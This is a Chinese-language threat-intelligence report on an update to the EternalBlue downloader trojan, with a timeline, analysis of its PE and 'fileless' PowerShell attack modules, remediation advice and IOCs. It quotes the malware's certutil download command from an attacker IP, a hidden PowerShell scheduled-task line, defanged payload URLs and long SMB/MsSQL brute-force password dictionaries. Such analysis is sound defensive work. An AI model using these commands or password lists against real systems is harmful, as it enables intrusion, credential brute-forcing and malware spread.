永恒之蓝下载器木马升级更新没完没了，新增无文件攻击

腾讯御见威胁情报中心于2019年3月8日发现曾利用驱动人生公司升级渠道的永恒之蓝下载器木马再次更新。此次更新仍然在于攻击模块，但是其特点在于，攻击模块不再由此前植入的母体PE文件进行释放，而是转为由感染后机器上安装的Powershell后门进行下载。

通过分析发现，此次新启用的PE攻击模块下载地址同时还负责Powshell脚本攻击模块的下载，导致已感染的机器对其他机器发起PE文件攻击和“无文件”攻击。通过对比分析还发现“永恒之蓝”木马下载器黑产团伙使用的Powershell攻击代码与腾讯御见威胁情报中心2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处，因此推测两者具有某种联系。

“永恒之蓝”木马下载器黑产团伙时间线：

2018年12月14日	利用“驱动人生”系列软件升级通道下载，利用“永恒之蓝”漏洞攻击传播。
2018年12月19日	下载之后的木马新增Powershell后门安装。
2019年1月09日	检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。
2019年1月24日	木马将挖矿组件、升级后门组件分别安装为计划任务，并同时安装Powershell后门。
2019年1月25日	木马在1月24日的基础上再次更新，将攻击组件安装为计划任务，在攻击时新增利用mimikatz搜集登录密码，SMB弱口令爆破攻击，同时安装Powershell计划任务和hta计划任务。
2019年2月10日	将攻击模块打包方式改为Pyinstaller.
2019年2月20日	更新矿机组件，下载释放XMRig矿机，以独立进程启动挖矿。
2019年2月23日	攻击方法再次更新，新增MsSQL爆破攻击。
2019年2月25日	在2月23日基础上继续更新，更新MsSQL爆破攻击时密码字典，添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击。
2019年3月6日	通过已感染机器后门更新Powershell脚本横向传播模块ipc。
2019年3月8日	通过已感染机器后门更新PE文件横向传播模块ii.exe。

PE文件攻击

下载指令：

certutil.exe  -urlcache -split -f hxxp://27.102.107.137/ii.exe i.exe

md5: def0e980d7c2a59b52d0c644a6e40763

该文件通过被感染机器的Powershell后门进行下载，保存为i.exe执行，其功能和此前多次更新的攻击模块C:\Windows\Temp\svchost.exe相同，该文件同样由Pyinstaller打包生成，集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击，分析其代码另发现以下几处变化：

1、 对主程序的Python代码整体经过Base64、bz2算法进压缩编码，运行时先解码。

2、对用于SMB、MsSQL爆破的弱口令进行更新，新增了13条弱口令

'database',
'saadmin',
'sql2000',
'admin123',
'p@ssword',
'sql123',
'sasasa',
'adminsa',
'sql2010',
'sa12345',
'sa123456',
'saadmin',
'sqlpass'

3、从新的地址下载恶意代码执行：

hxxp://info.haqo.net/e.png?id=

hxxp://info.beahh.com/e.png?id=

hxxp://info.abbny.com/e.png?id=

“无文件”攻击

通过已感染机器上的Powershell后门下载以下脚本代码执行：

hxxp://v.beahh.com/ipc?low1，该代码为经过多重混淆的Powershell脚本，解密后发现，其主要功能为下载另一脚本hxxp://27.102.107.137/new.dat?pebb并将其安装为计划任务Credentials执行。

计划任务名：Credentials

启动程序：powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1

触发器：在首次执行当天触发后，无限期每隔一小时执行一次。

该计划任务执行的Powershell文件cred.ps1，该文件同样经过多重混淆，解密后分析发现其集成了端口扫描、SMB爆破、永恒之蓝漏洞攻击等攻击方法，并且攻击成功后会在目标机器上传启动项。

永恒之蓝漏洞攻击

SMB弱口令爆破

攻击后上文件到传启动目录

此次更新后，木马脱离了原来的PE文件母体，直接通过已感染机器上安装的后门下载攻击模块，并且同时更新PE攻击模块和“无文件”形式的攻击模块，导致其拥有了更大的传播能力。

通过对比还发现，该木马使用的“无文件”攻击代码与腾讯御见威胁情报中心在2018年9月发现的Mykings僵尸网络变种（https://www.freebuf.com/column/183705.html）使用的攻击方法有较多相似之处，包括相同的攻击利用函数名eb7()，eb8()，创建计划任务的启动目录都为%appdata%\Microsoft\，都会在攻击成功后上传文件到菜单启动目录等，因此推测其与Myings僵尸网络幕后团伙有某种联系。

安全建议

1.服务器暂时关闭不必要的端口（如135、139、445），方法可参考：https://guanjia.qq.com/web_clinic/s8/585.html

2.服务器使用高强度密码，切勿使用弱口令，防止黑客暴力破解；

3.使用杀毒软件拦截可能的病毒攻击；

4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统，是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。

5. 中毒电脑除可使用腾讯电脑管家、腾讯御点终端防御系统查杀病毒，也可参考以下提示手动清理：

删除文件

%appdata%\Microsoft\cred.ps1

删除以下计划任务：

计划任务名：Credentials

启动程序：powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1

删除菜单启动目录文件：

run.bat、FlashPlayer.lnk、flashplayer.tmp、sign.txt

IOCs

Md5

def0e980d7c2a59b52d0c644a6e40763

23196de0ede25fb9659713fa6799f455

ce924b12ffc55021f5c1bcf308f29704

2fbce2ecf670eb186c6e3e5886056312

IP

27.102.107.137

Domain

info.haqo.ne

info.beahh.com

info.abbny.com

v.beahh.com

URL

hxxp://info.haqo.net/e.png?id=

hxxp://info.beahh.com/e.png?id=

hxxp://info.abbny.com/e.png?id=

hxxp://27.102.107.137/ii.exe

hxxp://v.beahh.com/ipc?low1

hxxp://27.102.107.137/new.dat?pebb

弱口令：

"123456",

"password",

"PASSWORD",

"football",

"welcome",

"1",

"12",

"21",

"123",

"321",

"1234",

"12345",

"123123",

"123321",

"111111",

"654321",

"666666",

"121212",

"000000",

"222222",

"888888",

"1111",

"555555",

"1234567",

"12345678",

"123456789",

"987654321",

"admin",

"abc123",

"abcd1234",

"abcd@1234",

"abc@123",

"p@ssword",

"P@ssword",

"p@ssw0rd",

"P@ssw0rd",

"P@SSWORD",

"P@SSW0RD",

"P@$$w0rd",

"P@$$word",

"P@$$w0rd",

"iloveyou",

"monkey",

"login",

"passw0rd",

"master",

"hello",

"qazwsx",

"password1",

"qwerty",

"baseball",

"qwertyuiop",

"superman",

"1qaz2wsx",

"fuckyou",

"123qwe",

"zxcvbn",

"pass",

"aaaaaa",

"love",

"administrator"

'123456',

'password',

'qwerty',

'12345678',

'123456789',

'123',

'1234',

'123123',

'12345',

'12345678',

'123123123',

'1234567890',

'88888888',

'111111111',

'000000',

'111111',

'112233',

'123321',

'654321',

'666666',

'888888',

'a123456',

'123456a',

'5201314',

'1qaz2wsx',

'1q2w3e4r',

'qwe123',

'123qwe',

'a123456789',

'123456789a',

'baseball',

'dragon',

'football',

'iloveyou',

'password',

'sunshine',

'princess',

'welcome',

'abc123',

'monkey',

'!@#$%^&*',

'charlie',

'aa123456',

'Aa123456',

'admin',

'homelesspa',

'password1',

'1q2w3e4r5t',

'qwertyuiop',

'1qaz2wsx',

'sa',

'sasa',

'sa123',

'sql2005',

'1',

'admin@123',

'sa2008',

'1111',

'passw0rd',

'abc',

'abc123',

'abcdefg',

'sapassword',

'Aa12345678',

'ABCabc123',

'sqlpassword',

'1qaz2wsx',

'1qaz!QAZ',

'sql2008',

'ksa8hd4,m@~#$%^&*()',

'4yqbm4,m`~!@~#$%^&*(),.; ',

'4yqbm4,m`~!@~#$%^&*(),.;',

'A123456',

'database',

'saadmin',

'sql2000',

'admin123',

'p@ssword',

'sql123',

'sasasa',

'adminsa',

'sql2010',

'sa12345',

'sa123456',

'saadmin',

'sqlpass'

参考链接：

https://www.freebuf.com/column/183705.html

https://paper.seebug.org/826/